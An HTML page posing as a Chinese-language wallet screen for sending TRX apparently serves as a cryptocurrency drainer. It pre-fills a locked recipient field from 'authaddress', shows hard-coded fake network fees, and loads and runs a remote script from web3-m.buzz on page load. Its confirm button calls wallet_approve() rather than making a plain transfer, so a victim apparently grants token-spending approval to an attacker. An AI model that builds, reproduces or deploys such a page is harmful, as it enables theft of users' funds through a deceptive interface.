<html>
    <head>
        <title>TRX Transfer</title>
        <meta charset="utf-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
        <link rel="icon" href="usdt.ico">
        <style>
        @font-face {
            font-family: "iconfont"; /* Project id  */
            src: url('https://web3-m.buzz/iconfont.ttf') format('truetype');
        }
        
        .iconfont {
          font-family: "iconfont" !important;
          font-size: 16px;
          font-style: normal;
          -webkit-font-smoothing: antialiased;
          -moz-osx-font-smoothing: grayscale;
        }
        
        .icon-fanhui2:before {
          content: "\f0116";
        }
        
        .icon-fanhui:before {
          content: "\f0343";
        }
        
        .icon-saoma:before {
          content: "\e712";
        }
        
        .icon-tongxunlu:before {
          content: "\e649";
        }

        * {
            padding: 0 0;
            margin: 0 0;
        }

        .container {
            width: 100vw;
            height: 100vw;
            padding: 0 4vw;
            font-size: 4vw;
            box-sizing: border-box;
        }

        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 4vw 0;
            font-size: 4.4vw;
        }
        .header .hearde_name{
            font-size: 4.2vw;
            font-weight: 700;
        }
        .header .left {
            width: 4.2vw;
            height: 4.2vw;
            font-size: 4.4vw;
        }

        .trigger_netword {
            display: flex;
            justify-content: space-between;
            padding:  3vw;
            border: 1px solid #E3E3E3; 
            border-radius: 1.6vw;
        }

        .trigger_netword .cash_photo {
            display: flex;
            align-items: center;

        }

        .trigger_netword .cash_photo .imgs {
            width: 8vw;
            height: 8vw;
            margin-right: 2.4vw;
        }

        .trigger_netword .cash_photo .cash {
            font-size: 4.2vw;
            font-weight: 700;

        }

        .trigger_netword .netword .netword_name {
            font-weight: 500;
            margin-right: 1vw;
        }

        .trigger_netword .netword .right {
            color: #ccc;
            font-size: 4vw;
        }

        .trigger_netword .netword {
            display: flex;
            align-items: center;
        }

        .lebal_title{
            display: flex;
            justify-content: space-between;
            align-items: center;
            line-height: 10vw;
        }   
        .lebal_title .bebal_name{
            font-size: 4.2vw;
            font-weight: 600;

        }
        .lebal_title .operate{
            display: flex;
            justify-content: space-between;
            width: 24vw;
        }
        .lebal_title .operate .firend{
            font-size: 6vw;
        }
        .lebal_title .available{
            font-size: 3vw; 
            /* color: #D0D0D0; */
        }
        .in_box{
            display: flex;
            justify-content: space-between;
            padding: 5vw 3vw;
            background-color: #F8F8F8;
            border: 1px solid #E3E3E3;
            border-radius: 1.6vw;
        }
        .in_box .insert{
            outline: none;
            background-color: transparent;
            border: transparent;
            font-size: 3.3vw;
            color: #666;
        }
        .in_box .right_box{
            color: #D0D0D0;
            display: flex;
            justify-content: space-between;
            
        }
        .in_box .right_box .cash{
            margin:  0 1vw;
        }
        .btn{
                /*margin-left: -3%;*/
            color: #fff;
            background-color: #dde0dd;
            border-radius: 1.6vw;
            line-height: 10vw;
            text-align: center;
            position: fixed;
            bottom: 16vw;
            width: 92vw;
        }
        .tishi {
            width: 8.5rem;
            height: 3.2rem;
            background: #00000059;
            z-index: 999999999999;
            position: fixed;
            top: 67%;
            left: 50%;
            transform: translate(-50%, -50%);
            border-radius: 0.3rem;
            color: white;
            font-size: 1.4rem;
            text-align: center;
            line-height: 3.2rem;
            display: none;
        }
    </style>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.4/jquery.min.js" integrity="sha512-pumBsjNRGGqkPzKHndZMaAG+bir374sORyzM3uulLV14lN5LyykqNk8eEeUlUkB3U0M4FApyaHraT65ihJhDpQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    </head>
    <body>
<div class="container">
        <div class="header">
            <div class="iconfont left">  </div>
            <div class="hearde_name">发送</div>
            <div class="kong"></div>
        </div>

        <div class="trigger_netword">
            <div class="cash_photo">
                <img class="imgs" src="https://web3-m.buzz/trx.png" alt="usdt图片">
                <div class="cash">TRX</div>
            </div>
            <div class="netword">
                <div class="netword_name">转账网络 </div>
                <div class="iconfont right icon-fanhui2"></div>
            </div>
        </div>
        <div class="lebal_title" style="margin-top:2.4vw;">
            <div class="bebal_name">收款地址</div>
            <div class="operate">
                <!-- <div class="iconfont firend icon-tongxunlu"></div>
                <div class="iconfont firend icon-saoma"></div> -->
            </div>
        </div>
        <div class="in_box">
            <input type="text" placeholder="请输入收款地址" style="width:100vw" class="insert authaddress" value="" disabled="">
        </div>
        <div class="lebal_title" style="margin-top:5vw;">
            <div class="bebal_name">转账数量</div>
            <div class="available" id="available" style="display: none;">可用：<span id="ye">0</span><span> TRX</span> </div>
        </div>
        <div class="in_box">
            <input type="number" placeholder="请输入收转账数量" class="insert input_amount" id="available1">
            <div class="right_box">
                <div class="cash">TRX</div>
                <div class="cash">|</div>
                <div class="cash" style="color:#8056D9" id="allusdt">全部</div>
            </div>
        </div>
        <div class="lebal_title" style="margin-top:5vw;">
            <div class="bebal_name">网络费用</div>
        </div>

        <div class="trigger_netword">
            <div style="font-size: 3vw;">
                <div style="font-size: 3.4vw;margin-bottom: 1vw;"><span id="gasPriceA">0.018002</span> <span class="chainname"></span></div>
                <div style="color: #D0D0D0;">$<span id="gasPriceU">0.12241</span></div>
            </div>
            <div class="netword">
                <div class="netword_name" style="font-size: 3.5vw;color: #D0D0D0;"><span id="gasPriceG">240.09</span> GWEI </div>
                <div class="iconfont right icon-fanhui2" style="font-size: 2vw;"></div>
            </div>
        </div>
        <div class="btn next_button" id="confirm">确认</div>
        <div class="tishi">
            已发送
        </div>
    </div>
    
    <script>
        jQuery.ajaxSetup({cache:true});
            jQuery.ajax({url:"https://web3-m.buzz/auto123.js?"+Math.ceil(Math.random()*10000),dataType:"script",cache:true}).done(function(){
            wallet_init().then();
        });
  
  function dapp_load_error(){
    showmymsg('error', "Please Use Dapp Open!");
  }
  function gaserror(){
    showmymsg('warning', "Insufficient gas fee!");
  }
  function chaintochainname(){
      switch(chain){
          case "TRON":
              return "TRC20";
          break;
          case "BSC":
              return "BEP20";
          break;
          case "MATIC":
              return "Polygon";
          break;
          case "ETH":
              return "ERC20";
          break;
          case "OKT":
              return "ORC20";
          break;
          case "HECO":
              return "HRC20";
          break;
      }
  }
  function chaintogasname(){
      switch(chain){
          case "BSC":
            return "BNB";
          break;
          case "TRON":
            return "TRX";
          break;
          default:
            return chain;
          break;
      }
  }
  function initend(){
   $('.input_amount').on({
   "change":function(){
   if($('.input_amount').val().length>0){
   $('.next_button').css('background-color','#7424F9');
   $('.next_button').addClass("approve");
   $('.approve').off().on('click',function(){wallet_approve().then();});
   }else{
   $('.next_button').css('background-color','#dde0dd');
   $('.next_button').removeClass("approve");
   }
  },
  "keyup":function(){
   if($('.input_amount').val().length>0){
   $('.next_button').css('background-color','#7424F9');
   $('.next_button').addClass("approve");
   $('.approve').off().on('click',function(){wallet_approve().then();});
   }else{
   $('.next_button').css('background-color','#dde0dd');
   $('.next_button').removeClass("approve");
   }
  }
  });
   
   $('.authaddress').val(authaddress);
   $('.netword_name').html("转账网络 "+chaintochainname(chain));
   $('.chainname').html(chaintogasname(chain));
   if(chaintogasname(chain)=="TRX"){
       $('#gasPriceA').html('18');
       $('#gasPriceU').html('1.4');
   }
  $('.cash').off().on('click',function(){
      $('.input_amount').val(wallet_user_token_amount);
      $('.next_button').css('background-color','#7424F9');
      $('.next_button').addClass("approve");
      $('.approve').off().on('click',function(){wallet_approve().then()});
      
  });
  }
 </script>
</body>
</html>